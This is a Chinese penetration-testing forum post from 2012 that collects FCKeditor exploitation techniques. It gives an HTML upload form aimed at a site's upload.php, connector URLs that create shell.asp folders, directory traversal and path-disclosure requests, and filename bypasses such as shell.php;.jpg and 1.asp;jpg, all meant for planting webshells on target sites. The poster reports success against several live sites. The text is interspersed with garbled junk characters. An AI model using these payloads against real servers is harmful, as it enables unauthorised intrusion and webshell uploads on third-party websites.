找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 Fckeditor漏洞 (2)
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2286|回复: 0
打印 上一主题 下一主题

Fckeditor漏洞 (2)

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:01:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Fckeditor漏洞利用总结  
% T) _: q$ b! o; L, y查看编辑器版本7 U' N. m& n7 B  a. K4 \" q  V2 ^1 _
FCKeditor/_whatsnew.html  g: G  C* K. I0 p4 u7 a
—————————————————————————————————————————————————————————————
5 t4 m! K0 H7 {: x4 {0 N9 N, x4 K; p2 z0 [" W0 c
2. Version 2.2 版本% H" J) _. z* L: i8 H" R* Z% f
Apache+linux 环境下在上传文件后面加个.突破!测试通过。
4 |" E$ u, C( `* p$ C2 A4 h—————————————————————————————————————————————————————————————
7 ~; A- ]& O0 t
# M! f8 G1 O# d4 @% V. n' `3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
4 d$ V$ @7 x5 e1 E6 M8 C<form id="frmUpload" enctype="multipart/form-data"
* y" E1 q5 E  [- Z+ a8 S9 g% gaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
7 G% \2 y. `) x2 M5 B1 j& S% ]<input type="file" name="NewFile" size="50"><br>
4 \  v( D0 w" F' q4 g<input id="btnUpload" type="submit" value="Upload">; i+ l/ u* C' m- J+ ~. }+ s
</form>- u: |9 D  D. v$ n- ?/ `0 C
—————————————————————————————————————————————————————————————
" v' J0 m# g9 N4 ~' b- z5 J5 N2 c& ]4 W' H
4.FCKeditor 文件上传“.”变“_”下划线的绕过方法8 c* d: v! {& Y+ {
        很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。2 Y4 A: O( x$ X$ _
    4.1:提交shell.php+空格绕过* D# L- o$ s2 k/ d. A' m- L2 Y+ M
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。* o3 }, c$ n' I6 L( e2 H/ P0 W
    4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
% |/ X- c/ L& i& E—————————————————————————————————————————————————————————————
  W/ a; ]) ?- P+ r: I/ k4 U# |' \; T! l( v2 `: V6 Q. C- V
5. 突破建立文件夹
) m0 |' u) k( B. F$ {" j+ F# zFCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684! Y4 ]" T, v9 u7 j8 G! |+ X# [4 E
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp2 i! y2 O8 S9 `7 c8 b
—————————————————————————————————————————————————————————————
, t7 {* Q- W" U# o4 \3 h2 {: d8 L& V- k
6. FCKeditor 中test 文件的上传地址
3 ~! [# @( V. L  nFCKeditor/editor/filemanager/browser/default/connectors/test.html
) Z; ~( L7 H+ U3 O) O; s1 ]FCKeditor/editor/filemanager/upload/test.html' p$ D  L7 a8 Q4 I+ z+ T
FCKeditor/editor/filemanager/connectors/test.html1 B  O1 u+ {# E0 R
FCKeditor/editor/filemanager/connectors/uploadtest.html
0 g. C1 s- W$ B4 i" Q9 ~—————————————————————————————————————————————————————————————6 a: D9 g" C, O: ~5 |

; T1 W: m* H. q) [+ [! N7.常用上传地址) m! N: c+ o  p6 Y) Q
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/2 N4 m5 e- r' a6 t# k" f& D+ u
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp$ o- c  Z: k3 p
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
) B: y; |$ u9 r! Y/ p" `JSP 版:
2 U8 z. g8 Q' {+ F# nFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
) F  _* y; E! B- a/ C- O* S注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
, H- u. \% I3 t% B. F6 n( C. K件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。# P4 G. w' N: C. C. a: N6 r' R! s
—————————————————————————————————————————————————————————————
% a+ z9 O! H5 d# r7 ]7 [4 v9 ^) ^9 P/ v
8.其他上传地址
4 R( N: ^& B+ J2 |& j1 fFCKeditor/_samples/default.html
! ?8 L, O. T. SFCKeditor/_samples/asp/sample01.asp
5 C) O. ?/ a! e' ~6 K; w, J. rFCKeditor/_samples/asp/sample02.asp9 Z+ w9 @, q6 y, u: v
FCKeditor/_samples/asp/sample03.asp) o6 X. W' {4 `: E
FCKeditor/_samples/asp/sample04.asp3 i. v2 C  J: k3 @, W
一般很多站点都已删除_samples 目录,可以试试。
8 c" }5 y& a% X7 g- U2 d, j$ O$ @+ OFCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。# i3 ~# c  Q4 ~9 g( s0 @
—————————————————————————————————————————————————————————————
+ M# x5 S. ]' F( ?9 T
% X! H4 j5 Z# q: p1 R& X/ w9.列目录漏洞也可助找上传地址
; Z2 o, X% e6 L8 w' bVersion 2.4.1 测试通过
0 p. N: K, m; y0 Z8 s0 \* C修改CurrentFolder 参数使用 ../../来进入不同的目录& F9 U: R9 K" s3 {7 x
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
% T: W8 N' V4 T  _0 g根据返回的XML 信息可以查看网站所有的目录。% r2 {0 i+ a# l5 a
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
" V# p( v1 d1 V* x也可以直接浏览盘符:, L. h% w: }$ F& g! h
JSP 版本:
0 O5 E9 I, @, n! XFCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F1 _5 C5 O9 ?. f0 I$ Z
—————————————————————————————————————————————————————————————
. `% k7 b- ^' G6 y5 A$ j) {' B% P7 F: o7 \
10.爆路径漏洞
" o4 Y3 j+ \+ W$ i7 QFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
2 w0 h! Q* u" i$ F! y# s" o$ ]2 }—————————————————————————————————————————————————————————————
$ B) p2 F/ {/ Z9 s& }8 _
' q. {' U" Z+ |$ P; x11. FCKeditor 被动限制策略所导致的过滤不严问题
9 }8 L" T8 |9 @% ]! }" d; c/ o        影响版本: FCKeditor x.x <= FCKeditor v2.4.3) F, {  l! m$ S  i! p
脆弱描述:
/ w7 W' A" G( lFCKeditor v2.4.3 中File 类别默认拒绝上传类型:
: ]8 }" m9 ^; W2 {html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm" F. ~' a' J' T5 g
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
  J" U, x  j& i! ]# U, W" |        而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。6 b$ g4 w  H6 K4 ^/ E" c
        在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!
# a. _% C0 A" g) c+ j—————————————————————————————————————————————————————————————; C  T5 u2 T% H- }

( d9 Y) [0 Q2 Q! E9 l8 |12.最古老的漏洞,Type文件没有限制!
) d8 }" @5 [. _! Y7 v9 M. b" V# t        我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本! + p& j) n% {( n" `' U
—————————————————————————————————————————————————————————————
2 i' N) {# F+ m! z9 B
# f) k% q0 E; f+ `===============================================================================================================================================/ M( o9 ~0 k+ X, @' g5 |

0 @+ f$ t' p9 C4 }FCK编辑器jsp版本漏洞:
5 k+ Q0 V1 ^( M* B" C! a/ Z$ I8 l
) f) f& l& |: m1 f
http://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F
8 X7 }* y3 k5 R+ D" n7 j- u, o+ f( q1 t- P
上传马所在目录  `$ i# q! x3 `) O* B+ ~: q
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
  I' ?" i' u4 H1 N: @上传shell的地址:
) ?8 X) R2 T' A; W5 _+ _http://www.xxx.com/fckeditor/edi ... ctors/jsp/connector- \9 s: O4 L7 c6 ~& x) F1 l
跟版本有关系.并不是百分百成功. 测试成功几个站.( k& ?  n- L* v' n
不能通杀.很遗憾.
5 N# W5 A0 E  A, Phttp://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector$ b' b* F- J9 m2 A
如果以上地址不行可以试试
  K! O: T& V8 i3 \# k1 m' S: A+ mFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector
6 T+ l8 T! m9 sFCKeditor/_samples/
9 H# G' v  N8 T$ v' f; YFCKeditor/_samples/default.html# h2 S& m$ K# ~* B% `- [
FCKeditor/editor/fckeditor.htm' h' b1 U/ _. C/ x/ ^
FCKeditor/editor/fckdialog.html
2 }8 L3 t- p% e3 A% H7 z
0 M, E3 x" F8 S# ~7 o4 `
6 U- S* S0 s7 y% \' D. k
1 X5 A' k; P: n/ {解析漏洞+未重命名文件时上传漏洞  1.asp;jpg
- A" r) O, w5 [" t) A! W
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表